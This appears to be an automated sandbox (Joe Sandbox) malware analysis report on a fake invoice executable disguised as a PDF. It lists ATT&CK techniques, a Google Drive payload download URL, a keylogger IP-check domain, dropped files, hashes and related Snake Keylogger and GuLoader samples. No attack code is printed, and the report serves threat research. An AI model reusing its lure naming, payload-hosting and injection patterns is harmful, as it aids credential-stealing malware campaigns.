Valid Accounts	1 Native API	1 Windows Service	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Windows Service	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	1 Disable or Modify Tools	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	16 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	12 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Timestomp	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
rFACTURA_FAC_2023_1-1000733.PDF.exe	20%	Virustotal		Browse
rFACTURA_FAC_2023_1-1000733.PDF.exe	5%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\antiphthisical\Primar\Cunicular\Densimetric\System.Reflection.Primitives.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\AdvSplash.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
checkip.dyndns.com	0%	Virustotal		Browse
checkip.dyndns.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com02	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com01	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com05	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/	0%	Virustotal		Browse
http://checkip.dyndns.org	0%	Virustotal		Browse
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.181.238	true	false		high
googlehosted.l.googleusercontent.com	142.250.185.193	true	false		high
checkip.dyndns.com	132.226.8.169	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown
doc-0s-a8-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3gi1cd44ihbckcd43d7dn78od/1679306700000/12467729248612761337/*/1XARcr4sm_5_dvnsnsVtsDOfjHfua_08k?e=download&uuid=dc7be3b5-c5f0-4bcb-ad3e-a7d72194b047	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.certum.pl/ctsca2021.crl0o	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
http://repository.certum.pl/ctnca.cer09	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
http://crl.certum.pl/ctnca.crl0k	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
https://drive.google.com/2	CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://creativecommons.org/ns#ShareAlike	battery-level-90-charging-symbolic.svg.0.dr	false		high
http://upx.sf.net	Amcache.hve.LOG1.15.dr, Amcache.hve.15.dr	false		high
http://checkip.dyndns.org	CasPol.exe, 0000000B.00000002.1876903989.0000000034291000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
https://doc-0s-a8-docs.googleusercontent.com/#	CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp	false		high
http://creativecommons.org/ns#	battery-level-90-charging-symbolic.svg.0.dr	false		high
https://github.com/dotnet/runtime	rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp, System.Reflection.Primitives.dll.0.dr, System.Reflection.TypeExtensions.dll.0.dr	false		high
http://creativecommons.org/ns#DerivativeWorks	battery-level-90-charging-symbolic.svg.0.dr	false		high
https://doc-0s-a8-docs.googleusercontent.com/	CasPol.exe, 0000000B.00000002.1859898012.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003AC0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://creativecommons.org/licenses/by-sa/4.0/	battery-level-90-charging-symbolic.svg.0.dr	false		high
http://creativecommons.org/ns#Distribution	battery-level-90-charging-symbolic.svg.0.dr	false		high
http://repository.certum.pl/ctsca2021.cer0	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
http://subca.ocsp-certum.com05	rFACTURA_FAC_2023_1-1000733.PDF.exe	false	Avira URL Cloud: safe	unknown
http://creativecommons.org/ns#Attribution	battery-level-90-charging-symbolic.svg.0.dr	false		high
http://subca.ocsp-certum.com02	rFACTURA_FAC_2023_1-1000733.PDF.exe	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	rFACTURA_FAC_2023_1-1000733.PDF.exe	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	CasPol.exe, 0000000B.00000003.1385137269.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1385837889.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
http://repository.certum.pl/ctnca2.cer09	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
https://github.com/dotnet/runtimeBSJB	rFACTURA_FAC_2023_1-1000733.PDF.exe, 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmp, System.Reflection.TypeExtensions.dll.0.dr	false		high
https://drive.google.com/j	CasPol.exe, 0000000B.00000002.1859898012.0000000003A1B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	CasPol.exe, 0000000B.00000002.1876903989.00000000342A5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://creativecommons.org/ns#Notice	battery-level-90-charging-symbolic.svg.0.dr	false		high
http://creativecommons.org/ns#Reproduction	battery-level-90-charging-symbolic.svg.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 0000000B.00000002.1876903989.00000000341E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	rFACTURA_FAC_2023_1-1000733.PDF.exe	false		high
https://doc-0s-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mjejjps3	CasPol.exe, 0000000B.00000003.1385137269.0000000003AC6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A90000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1389269538.0000000003A90000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.1385837889.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.1859898012.0000000003A78000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	true
142.250.181.238	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	830399
Start date and time:	2023-03-20 11:00:46 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	rFACTURA_FAC_2023_1-1000733.PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/21@3/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 35.6% (good quality ratio 34.7%) Quality average: 88% Quality standard deviation: 22.2%
HCA Information:	Successful, ratio: 89% Number of executed functions: 77 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20
Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, umwatson.events.data.microsoft.com, wdcp.microsoft.com
Execution Graph export aborted for target CasPol.exe, PID 6576 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	RFQ-GCE-Piping_&_Steel_Requirment.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipment_Detail.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	KNcPu6PwgIyFBrH.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	OSS22005693AB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	hjXFi8NFTRyUspx.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PI-_IF269J0163.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SALES_CONFIRMATOIN.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Vessel's_particulars.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-500741.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	swift_copy.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Y2UGyvGSuAoeJYD.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	MV_PEBBLE_BEACH.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Cotizaci#U00f3n_Urgente.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SWIFT.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO-11435.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	uLstc8dUlN.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	TRANSFERENCIAPayment.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase_Inquiry.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	OSS22005693AB.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Fotograf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Purchase_orderAgreement.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Advice_payment.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Vesse_particulars.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	POR.117-TANGSHAN_XIELI_-_CHINA.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RFQ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Shipment_Details.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	$49,127.00_.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	W6S6lQ6Ae1.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Order_Ref_53089.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Rechung-R1663322504.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	INQUIRY.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	os9ENgy8Y7.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Vessel_Particulars.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	invoice.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	RFQ-GCE-Piping_&_Steel_Requirment.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Vessel_Description.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	jljwdT2pVF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	New_Order_list.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	OSS22005693AB.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Fotograf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Purchase_orderAgreement.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Vesse_particulars.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Shipment_Details.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	$49,127.00_.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Order_Ref_53089.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INQUIRY.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	RFQ-GCE-Piping_&_Steel_Requirment.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Vessel_Description.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Shipment_Detail.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	KNcPu6PwgIyFBrH.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Requirements Details Attachments _#Uacac#Uc801 #Uc694#Uccad #Uac74.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	product.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	OSS22005693AB.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	hjXFi8NFTRyUspx.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	PI-_IF269J0163.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SALES_CONFIRMATOIN.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Vessel's_particulars.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SOA.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	FAKTURA_BG_01.exe	Get hash	malicious	Remcos, DBatLoader	Browse	142.250.181.238 142.250.185.193
	20230320.vbs	Get hash	malicious	Remcos	Browse	142.250.181.238 142.250.185.193
	Q9k5bf6Rku.dll	Get hash	malicious	Unknown	Browse	142.250.181.238 142.250.185.193
	OYm3R777Yb.exe	Get hash	malicious	Amadey, Babuk, Djvu, Fabookie, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	142.250.181.238 142.250.185.193
	gbK76vpcp8.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	142.250.181.238 142.250.185.193
	r7icIGgp7u.exe	Get hash	malicious	Amadey, Djvu, RHADAMANTHYS, RedLine, SmokeLoader, Vidar	Browse	142.250.181.238 142.250.185.193
	dM4dewAIIl.exe	Get hash	malicious	Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Amadey, Babuk, Djvu, Fabookie, RedLine, SmokeLoader, Vidar	Browse	142.250.181.238 142.250.185.193
	software.exe	Get hash	malicious	Babuk, Djvu	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, HTMLPhisher, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Amadey, Djvu, Fabookie, RHADAMANTHYS, SmokeLoader, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Clipboard Hijacker, Djvu, Vidar	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Djvu	Browse	142.250.181.238 142.250.185.193
	setup.exe	Get hash	malicious	Amadey, Djvu, RHADAMANTHYS, SmokeLoader, Vidar	Browse	142.250.181.238 142.250.185.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\System.Reflection.TypeExtensions.dll	rJUSTIFICANTEDEPAGO.exe	Get hash	malicious	GuLoader	Browse
	rAEAT-AvisodeNotificaci__n.exe	Get hash	malicious	GuLoader	Browse
	AEAT-Notificaci#U00f3n..rar	Get hash	malicious	GuLoader	Browse
	PO-TO003256.exe	Get hash	malicious	GuLoader	Browse
	PO-TO003256.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.25087.6320.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.12248.18354.exe	Get hash	malicious	GuLoader	Browse
	DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe	Get hash	malicious	GuLoader	Browse
	PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	DOC Shane inancial Holdings LLC Transaction Information 11.10.2022 .exe	Get hash	malicious	GuLoader	Browse
	PO-EP3141802303 -42804009_83276378283989393872376532893293009783763.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_caspol.exe_c9831a337d3627d9a81a22112d1a4918180c9e2_ea830a9b_d3bd527c-2f90-4458-9cd4-e1517201fb0e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2413907368074433
Encrypted:	false
SSDEEP:	192:9fE059v6x3mBUWSaX+AMWVM+Du76zfAIO8h:S0j6wBUWSaOaq+Du76zfAIO8h
MD5:	35DD3D5B04B74FA528100F3D0EFD2762
SHA1:	7152E07DBB8C0F5FBF780254D2E2E8C46B7B9F1F
SHA-256:	90E8785A4995B03B26F73D1A63BD0AADF591CAD0E8CBC0A35DA78088B3364F7B
SHA-512:	FC42405BD29FE2913BDB0A7D8C8F32CDBC6794F8B6E310A704A53AD96E95C4449F327EFF9146328001B51D4FB5DD97ED1CF0580545CAE3C43D8D3140007AC9BD
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.3.7.8.3.9.7.8.4.7.3.0.2.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.3.7.8.3.9.7.9.5.8.2.1.6.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.b.d.5.2.7.c.-.2.f.9.0.-.4.4.5.8.-.9.c.d.4.-.e.1.5.1.7.2.0.1.f.b.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.0.9.1.5.c.9.-.1.e.3.8.-.4.8.8.f.-.9.3.e.3.-.2.9.7.4.f.e.7.f.a.a.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.a.s.p.o.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.a.s.p.o.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.0.-.0.0.0.1.-.0.0.1.5.-.8.b.d.3.-.1.8.f.6.1.b.5.b.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.6.8.c.a.3.f.0.1.3.c.4.9.0.1.6.1.c.0.1.5.6.e.f.3.5.9.a.f.0.3.5.9.4.a.e.5.e.2.!.C.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B2E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Mar 20 11:06:18 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	298062
Entropy (8bit):	3.5731501507227876
Encrypted:	false
SSDEEP:	3072:5YgOQBtas+vqyCftZYyC4uEq5mS2VLTgKQh85:5JHaseqyCDFC4Of2BTgh
MD5:	EBEB9263C8F7B88F1C962D0F6D174ED7
SHA1:	49718D4D2B825BFC51D546C3360190787F9CC0DF
SHA-256:	5A6B0099475067373495611C80EE30CD8FFF8CBCC41570CA6E3203FE371399D4
SHA-512:	F61A6D1019C9BE483002858790ABC909C8AC52821310B07ACA70F4790E8905F0DD8AD7AE08B13413D1353F3517D2E76532BBFA455F047C209CD2EE6759EF6EFC
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......*>.d.........................#..........."..,c..........T.......8...........T........... c...)...........,..........................................................................................bJ......8/......GenuineIntel...........T............>.d.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DBF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8478
Entropy (8bit):	3.7135390864151505
Encrypted:	false
SSDEEP:	192:R9l7lZNipu6ISD1/6Y786zgmfZkCL9pr189b2Ssf0EkSm:R9lnNig6ISp6YA6zgmfWN2RfXQ
MD5:	FF404A19C5664B74EF66C62FD6BC2652
SHA1:	D287A995597C29843696562F0B0778734BBBB778
SHA-256:	90016E84D9557D7D3D5C53E9CFCAF383A41AE3D38640E8504B31FFA71B6AA4CD
SHA-512:	D7C9874B81D30F8C75CE136FF25F53443276F831FBB29DFA65914EDD8550B2D22E22D98182FE976F9CF2FB99EEBF4210BCA17B5F9284C9B3CE2D53989D8D0ABE
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DEF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
